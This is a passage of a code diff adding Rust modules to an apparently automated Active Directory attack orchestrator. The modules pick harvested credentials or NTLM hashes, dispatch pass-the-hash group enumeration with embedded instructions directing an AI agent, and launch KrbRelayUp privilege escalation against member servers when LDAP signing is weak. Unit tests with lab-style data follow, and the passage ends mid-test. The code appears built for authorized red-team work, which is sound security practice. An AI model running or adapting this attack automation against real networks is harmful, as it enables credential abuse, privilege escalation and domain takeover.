+ let (cred, using_trust_cred) =
+ if !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred) {
+ let c = state
+ .credentials
+ .iter()
+ .find(|c| c.domain.to_lowercase() == domain.to_lowercase())
+ .cloned();
+ (c, false)
+ } else {
+ (None, false)
+ };
+ let (cred, using_trust_cred) =
+ if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust) {
+ match state.find_trust_credential(domain) {
+ Some(c) => (Some(c), true),
+ None => (None, using_trust_cred),
+ }
+ } else {
+ (cred, using_trust_cred)
+ };
+
+ // Look for NTLM hash (PTH) — fires independently of cred attempt
+ let (ntlm_hash, ntlm_hash_username) =
+ if cred.is_none() && !state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash) {
+ state
+ .hashes
+ .iter()
+ .find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && h.username.to_lowercase() == "administrator"
+ })
+ .or_else(|| {
+ state.hashes.iter().find(|h| {
+ h.hash_type.to_lowercase() == "ntlm"
+ && h.domain.to_lowercase() == domain.to_lowercase()
+ && !state.is_delegation_account(&h.username)
+ })
+ })
+ .map(|h| (Some(h.hash_value.clone()), Some(h.username.clone())))
+ .unwrap_or((None, None))
+ } else {
+ (None, None)
+ };
+
+ // Need at least a credential or an NTLM hash
+ if cred.is_none() && ntlm_hash.is_none() {
+ debug!(
+ domain = %domain,
+ cred_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_cred),
+ trust_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_trust),
+ hash_dedup = state.is_processed(DEDUP_GROUP_ENUMERATION, &dedup_key_hash),
+ "Group enum: no credential/hash found for domain"
+ );
+ continue;
+ }
+
+ let dedup_key = if ntlm_hash.is_some() {
+ dedup_key_hash
+ } else if using_trust_cred {
+ dedup_key_trust
+ } else {
+ dedup_key_cred
+ };
+
+ items.push(GroupEnumWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ credential: cred.unwrap_or_else(|| ares_core::models::Credential {
+ id: String::new(),
+ username: ntlm_hash_username.clone().unwrap_or_default(),
+ password: String::new(),
+ domain: domain.clone(),
+ source: "hash_fallback".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }),
+ ntlm_hash,
+ ntlm_hash_username,
+ });
+ }
+
+ items
+}
+
+/// Dispatches group enumeration per domain.
+/// Interval: 45s.
+pub async fn auto_group_enumeration(
+ dispatcher: Arc,
+ mut shutdown: watch::Receiver,
+) {
+ let mut interval = tokio::time::interval(Duration::from_secs(20));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("group_enumeration") {
+ continue;
+ }
+
+ let work: Vec = {
+ let state = dispatcher.state.read().await;
+ collect_group_enum_work(&state)
+ };
+
+ if !work.is_empty() {
+ info!(
+ count = work.len(),
+ domains = ?work.iter().map(|w| w.domain.as_str()).collect::>(),
+ "Group enumeration work items collected"
+ );
+ }
+ for item in work {
+ // When PTH hash is available, use the hash user's identity for the target domain
+ // instead of a cross-domain credential that will fail LDAP simple bind.
+ let (cred_user, cred_pass, cred_domain) = if item.ntlm_hash.is_some() {
+ (
+ item.ntlm_hash_username
+ .clone()
+ .unwrap_or_else(|| item.credential.username.clone()),
+ String::new(), // empty password forces PTH path
+ item.domain.clone(), // target domain, not cross-domain
+ )
+ } else {
+ (
+ item.credential.username.clone(),
+ item.credential.password.clone(),
+ item.credential.domain.clone(),
+ )
+ };
+ let cross_domain = cred_domain.to_lowercase() != item.domain.to_lowercase();
+ let mut payload = json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "credential": {
+ "username": cred_user,
+ "password": cred_pass,
+ "domain": cred_domain,
+ },
+ "filters": ["(objectCategory=group)"],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "managedBy",
+ "groupType", "objectSid", "description", "cn"
+ ],
+ "enumerate_members": true,
+ "resolve_foreign_principals": true,
+ "instructions": concat!(
+ "Enumerate ALL security groups in this domain.\n\n",
+ "AUTHENTICATION: If the password field is EMPTY and an NTLM hash is provided, ",
+ "you MUST use pass-the-hash. Do NOT attempt LDAP simple bind with empty password.\n",
+ " Use rpcclient_command with the hash parameter: rpcclient_command(target=dc_ip, ",
+ "username=user, domain=domain, hash=, command='enumdomgroups') — ",
+ "then for each group RID: 'querygroupmem ' and 'queryuser ' to resolve members.\n",
+ " IMPORTANT: Pass the hash via the 'hash' parameter, NOT as the password.\n\n",
+ "If a password IS provided, use ldap_search with filter (objectCategory=group) ",
+ "to enumerate groups, members, and Foreign Security Principals.\n\n",
+ "CROSS-DOMAIN AUTH: If the credential domain differs from the target domain ",
+ "(e.g. credential from child.domain.local querying parent domain.local), ",
+ "you MUST pass bind_domain= to ldap_search. ",
+ "Check the 'bind_domain' field in the task payload — if present, always pass it ",
+ "to ldap_search so the LDAP bind uses user@bind_domain while querying the target domain.\n\n",
+ "For EACH group found, report it as a vulnerability:\n",
+ " vuln_type: 'group_enumerated'\n",
+ " target: the group sAMAccountName\n",
+ " target_ip: the DC IP\n",
+ " domain: the domain\n",
+ " details: {\"group_type\": \"Global/DomainLocal/Universal\", ",
+ "\"members\": [\"user1\", \"user2\"], \"managed_by\": \"manager\", ",
+ "\"admin_count\": true/false}\n\n",
+ "Pay special attention to: Domain Admins, Enterprise Admins, Administrators, ",
+ "Backup Operators, Server Operators, Account Operators, DnsAdmins, ",
+ "and any custom groups with adminCount=1.\n\n",
+ "Report cross-domain memberships as vuln_type='foreign_group_membership'.\n\n",
+ "IMPORTANT: For each user found, include in discovered_users array:\n",
+ " {\"username\": \"samaccountname\", \"domain\": \"domain.local\", ",
+ "\"source\": \"ldap_group_enumeration\", \"memberOf\": [\"Group1\", \"Group2\"]}"
+ ),
+ });
+ if cross_domain {
+ payload["bind_domain"] = json!(item.credential.domain);
+ }
+ // Attach NTLM hash for PTH when no cleartext cred for target domain
+ if let Some(ref hash) = item.ntlm_hash {
+ payload["ntlm_hash"] = json!(hash);
+ }
+ if let Some(ref user) = item.ntlm_hash_username {
+ payload["hash_username"] = json!(user);
+ }
+
+ let priority = dispatcher.effective_priority("group_enumeration");
+ match dispatcher
+ .force_submit("recon", "recon", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Group enumeration dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_GROUP_ENUMERATION, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_GROUP_ENUMERATION, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ info!(domain = %item.domain, dc = %item.dc_ip, "Group enumeration deferred by throttler");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch group enumeration");
+ }
+ }
+ }
+ }
+}
+
+struct GroupEnumWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ credential: ares_core::models::Credential,
+ ntlm_hash: Option,
+ ntlm_hash_username: Option,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+
+ #[test]
+ fn dedup_key_format() {
+ let key_cred = format!("group_enum:{}:cred", "contoso.local");
+ let key_hash = format!("group_enum:{}:hash", "contoso.local");
+ assert_eq!(key_cred, "group_enum:contoso.local:cred");
+ assert_eq!(key_hash, "group_enum:contoso.local:hash");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_GROUP_ENUMERATION, "group_enumeration");
+ }
+
+ #[test]
+ fn payload_structure_has_correct_technique() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let payload = json!({
+ "technique": "ldap_group_enumeration",
+ "target_ip": "192.168.58.10",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ "filters": ["(objectCategory=group)"],
+ "attributes": [
+ "sAMAccountName", "member", "memberOf", "managedBy",
+ "groupType", "objectSid", "description", "cn"
+ ],
+ "enumerate_members": true,
+ "resolve_foreign_principals": true,
+ });
+ assert_eq!(payload["technique"], "ldap_group_enumeration");
+ assert_eq!(payload["target_ip"], "192.168.58.10");
+ assert!(payload["enumerate_members"].as_bool().unwrap());
+ assert!(payload["resolve_foreign_principals"].as_bool().unwrap());
+ }
+
+ #[test]
+ fn ldap_attributes_list() {
+ let attrs = [
+ "sAMAccountName",
+ "member",
+ "memberOf",
+ "managedBy",
+ "groupType",
+ "objectSid",
+ "description",
+ "cn",
+ ];
+ assert_eq!(attrs.len(), 8);
+ assert!(attrs.contains(&"sAMAccountName"));
+ assert!(attrs.contains(&"objectSid"));
+ assert!(attrs.contains(&"managedBy"));
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+ let work = GroupEnumWork {
+ dedup_key: "group_enum:contoso.local".into(),
+ domain: "contoso.local".into(),
+ dc_ip: "192.168.58.10".into(),
+ credential: cred,
+ ntlm_hash: None,
+ ntlm_hash_username: None,
+ };
+ assert_eq!(work.domain, "contoso.local");
+ assert_eq!(work.dc_ip, "192.168.58.10");
+ assert_eq!(work.credential.username, "admin");
+ }
+
+ #[test]
+ fn dedup_key_normalizes_domain() {
+ let key = format!("group_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+ assert_eq!(key, "group_enum:contoso.local");
+ }
+
+ #[test]
+ fn dedup_keys_differ_per_domain() {
+ let key1 = format!("group_enum:{}:cred", "contoso.local");
+ let key2 = format!("group_enum:{}:cred", "fabrikam.local");
+ assert_ne!(key1, key2);
+ }
+
+ #[test]
+ fn collect_hash_fires_after_cred_dedup_burned() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Cred-based attempt already dispatched (may have failed)
+ state.mark_processed(
+ DEDUP_GROUP_ENUMERATION,
+ "group_enum:contoso.local:cred".into(),
+ );
+ // Add an NTLM hash — should still generate work via hash path
+ state.hashes.push(ares_core::models::Hash {
+ id: "h1".into(),
+ username: "Administrator".into(),
+ hash_value: "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0".into(),
+ hash_type: "ntlm".into(),
+ domain: "contoso.local".into(),
+ source: "secretsdump".into(),
+ cracked_password: None,
+ discovered_at: None,
+ parent_id: None,
+ aes_key: None,
+ attack_step: 0,
+ });
+ let work = collect_group_enum_work(&state);
+ assert_eq!(
+ work.len(),
+ 1,
+ "hash path should fire even after cred dedup burned"
+ );
+ assert_eq!(work[0].dedup_key, "group_enum:contoso.local:hash");
+ assert!(work[0].ntlm_hash.is_some());
+ }
+
+ fn make_credential(
+ username: &str,
+ password: &str,
+ domain: &str,
+ ) -> ares_core::models::Credential {
+ ares_core::models::Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ #[test]
+ fn collect_empty_state_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_group_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_group_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_with_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dc_ip, "192.168.58.10");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_dedup_skips_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state.mark_processed(
+ DEDUP_GROUP_ENUMERATION,
+ "group_enum:contoso.local:cred".into(),
+ );
+ state.mark_processed(
+ DEDUP_GROUP_ENUMERATION,
+ "group_enum:contoso.local:hash".into(),
+ );
+ let work = collect_group_enum_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_cross_domain_cred_skipped_without_hash() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Only fabrikam cred — should NOT fall back cross-domain (burns dedup slot)
+ state
+ .credentials
+ .push(make_credential("crossuser", "P@ssw0rd!", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 0, "cross-domain cred should not produce work");
+ }
+
+ #[test]
+ fn collect_multiple_domains() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .domain_controllers
+ .insert("fabrikam.local".into(), "192.168.58.20".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("fadmin", "Pass!456", "fabrikam.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn collect_dedup_key_lowercased() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("CONTOSO.LOCAL".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].dedup_key, "group_enum:contoso.local:cred");
+ }
+
+ #[test]
+ fn collect_prefers_same_domain_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("localadmin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].credential.username, "localadmin");
+ }
+
+ #[test]
+ fn collect_child_cred_falls_back_for_parent_domain() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ // Child-domain cred should work for parent-domain via trust
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "north.contoso.local")); // pragma: allowlist secret
+ let work = collect_group_enum_work(&state);
+ assert_eq!(
+ work.len(),
+ 1,
+ "child-domain cred should fall back for parent"
+ );
+ assert_eq!(work[0].dedup_key, "group_enum:contoso.local:trust");
+ assert_eq!(work[0].credential.domain, "north.contoso.local");
+ }
+
+ #[tokio::test]
+ async fn collect_via_shared_state() {
+ let shared = SharedState::new("test-op".into());
+ {
+ let mut state = shared.write().await;
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ }
+ let state = shared.read().await;
+ let work = collect_group_enum_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "contoso.local");
+ }
+}
diff --git a/ares-cli/src/orchestrator/automation/krbrelayup.rs b/ares-cli/src/orchestrator/automation/krbrelayup.rs
new file mode 100644
index 00000000..39c17801
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/krbrelayup.rs
@@ -0,0 +1,527 @@
+//! auto_krbrelayup -- exploit KrbRelayUp when LDAP signing is not enforced.
+//!
+//! KrbRelayUp abuses Kerberos authentication relay to LDAP when LDAP signing
+//! is not required. It creates a computer account (MAQ > 0), relays Kerberos
+//! auth to LDAP to set up RBCD on a target, then uses S4U2Self/S4U2Proxy
+//! to get a service ticket as admin. This is a local privilege escalation
+//! that works from any authenticated domain user to SYSTEM on domain-joined hosts.
+//!
+//! Prereqs: LDAP signing NOT enforced (checked by auto_ldap_signing),
+//! MAQ > 0 (checked by auto_machine_account_quota), valid domain creds.
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect KrbRelayUp work items from current state.
+///
+/// Pure logic extracted from `auto_krbrelayup` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_krbrelayup_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ // Check if any DC has LDAP signing disabled (vuln registered by auto_ldap_signing)
+ let has_ldap_weak = state.discovered_vulnerabilities.values().any(|v| {
+ let vtype = v.vuln_type.to_lowercase();
+ vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required"
+ });
+
+ if !has_ldap_weak {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ // Target non-DC hosts (priv esc on member servers)
+ for host in &state.hosts {
+ if host.is_dc {
+ continue;
+ }
+
+ // Skip hosts we already own
+ if state.is_processed(DEDUP_SECRETSDUMP, &host.ip) {
+ continue;
+ }
+
+ let dedup_key = format!("krbrelayup:{}", host.ip);
+ if state.is_processed(DEDUP_KRBRELAYUP, &dedup_key) {
+ continue;
+ }
+
+ let domain = host
+ .hostname
+ .find('.')
+ .map(|i| host.hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+
+ let cred = state
+ .credentials
+ .iter()
+ .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain)
+ .or_else(|| state.credentials.first())
+ .cloned();
+
+ let cred = match cred {
+ Some(c) => c,
+ None => continue,
+ };
+
+ items.push(KrbRelayUpWork {
+ dedup_key,
+ target_ip: host.ip.clone(),
+ hostname: host.hostname.clone(),
+ domain,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches KrbRelayUp exploitation against hosts when LDAP signing is weak.
+/// Interval: 45s.
+pub async fn auto_krbrelayup(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("krbrelayup") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_krbrelayup_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "krbrelayup",
+ "target_ip": item.target_ip,
+ "hostname": item.hostname,
+ "domain": item.domain,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("krbrelayup");
+ match dispatcher
+ .throttled_submit("privesc", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ target = %item.target_ip,
+ hostname = %item.hostname,
+ "KrbRelayUp exploitation dispatched"
+ );
+
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_KRBRELAYUP, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_KRBRELAYUP, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(target = %item.target_ip, "KrbRelayUp deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, target = %item.target_ip, "Failed to dispatch KrbRelayUp");
+ }
+ }
+ }
+ }
+}
+
+struct KrbRelayUpWork {
+ dedup_key: String,
+ target_ip: String,
+ hostname: String,
+ domain: String,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host, VulnerabilityInfo};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ fn make_ldap_vuln() -> VulnerabilityInfo {
+ VulnerabilityInfo {
+ vuln_id: "ldap-weak-1".into(),
+ vuln_type: "ldap_signing_disabled".into(),
+ target: "192.168.58.10".into(),
+ discovered_by: "test".into(),
+ discovered_at: chrono::Utc::now(),
+ details: Default::default(),
+ recommended_agent: String::new(),
+ priority: 5,
+ }
+ }
+
+ // --- collect_krbrelayup_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_ldap_vuln_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_non_dc_host_with_ldap_vuln_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].target_ip, "192.168.58.30");
+ assert_eq!(work[0].hostname, "srv01.contoso.local");
+ assert_eq!(work[0].domain, "contoso.local");
+ assert_eq!(work[0].dedup_key, "krbrelayup:192.168.58.30");
+ }
+
+ #[test]
+ fn collect_skips_dc_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.10", "dc01.contoso.local", true));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_dedup_skips_already_processed() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ state.mark_processed(DEDUP_KRBRELAYUP, "krbrelayup:192.168.58.30".into());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_skips_already_owned_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into());
+ let work = collect_krbrelayup_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_ldap_signing_not_required_also_triggers() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ let mut vuln = make_ldap_vuln();
+ vuln.vuln_type = "ldap_signing_not_required".into();
+ state.discovered_vulnerabilities.insert("v1".into(), vuln);
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 1);
+ }
+
+ #[test]
+ fn collect_bare_hostname_uses_fallback_cred() {
+ let mut state = StateInner::new("test-op".into());
+ state.hosts.push(make_host("192.168.58.30", "ws01", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 1);
+ assert_eq!(work[0].domain, "");
+ assert_eq!(work[0].credential.username, "admin");
+ }
+
+ #[test]
+ fn collect_multiple_non_dc_hosts() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .hosts
+ .push(make_host("192.168.58.30", "srv01.contoso.local", false));
+ state
+ .hosts
+ .push(make_host("192.168.58.31", "srv02.fabrikam.local", false));
+ state
+ .credentials
+ .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret
+ state
+ .credentials
+ .push(make_credential("svcacct", "Svc!Pass1", "fabrikam.local")); // pragma: allowlist secret
+ state
+ .discovered_vulnerabilities
+ .insert("v1".into(), make_ldap_vuln());
+ let work = collect_krbrelayup_work(&state);
+ assert_eq!(work.len(), 2);
+ }
+
+ #[test]
+ fn dedup_key_format() {
+ let key = format!("krbrelayup:{}", "192.168.58.22");
+ assert_eq!(key, "krbrelayup:192.168.58.22");
+ }
+
+ #[test]
+ fn dedup_set_name() {
+ assert_eq!(DEDUP_KRBRELAYUP, "krbrelayup");
+ }
+
+ #[test]
+ fn ldap_signing_vuln_types() {
+ let types = ["ldap_signing_disabled", "ldap_signing_not_required"];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype == "ldap_signing_disabled" || vtype == "ldap_signing_not_required",
+ "{t} should match LDAP weak signing"
+ );
+ }
+ }
+
+ #[test]
+ fn non_ldap_vuln_types_rejected() {
+ let types = ["smb_signing_disabled", "mssql_access"];
+ for t in &types {
+ let vtype = t.to_lowercase();
+ assert!(
+ vtype != "ldap_signing_disabled" && vtype != "ldap_signing_not_required",
+ "{t} should NOT match LDAP weak signing"
+ );
+ }
+ }
+
+ #[test]
+ fn domain_from_hostname() {
+ let hostname = "srv01.contoso.local";
+ let domain = hostname
+ .find('.')
+ .map(|i| hostname[i + 1..].to_lowercase())
+ .unwrap_or_default();
+ assert_eq!(domain, "contoso.local");
+ }
+
+ #[test]
+ fn payload_structure_validation() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "admin".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let payload = serde_json::json!({
+ "technique": "krbrelayup",
+ "target_ip": "192.168.58.30",
+ "hostname": "srv01.contoso.local",
+ "domain": "contoso.local",
+ "credential": {
+ "username": cred.username,
+ "password": cred.password,
+ "domain": cred.domain,
+ },
+ });
+
+ assert_eq!(payload["technique"], "krbrelayup");
+ assert_eq!(payload["target_ip"], "192.168.58.30");
+ assert_eq!(payload["hostname"], "srv01.contoso.local");
+ assert_eq!(payload["domain"], "contoso.local");
+ assert_eq!(payload["credential"]["username"], "admin");
+ assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret
+ assert_eq!(payload["credential"]["domain"], "contoso.local");
+ }
+
+ #[test]
+ fn work_struct_construction() {
+ let cred = ares_core::models::Credential {
+ id: "c1".into(),
+ username: "testuser".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "contoso.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ };
+
+ let work = KrbRelayUpWork {
+ dedup_key: "krbrelayup:192.168.58.30".into(),
+ target_ip: "192.168.58.30".into(),
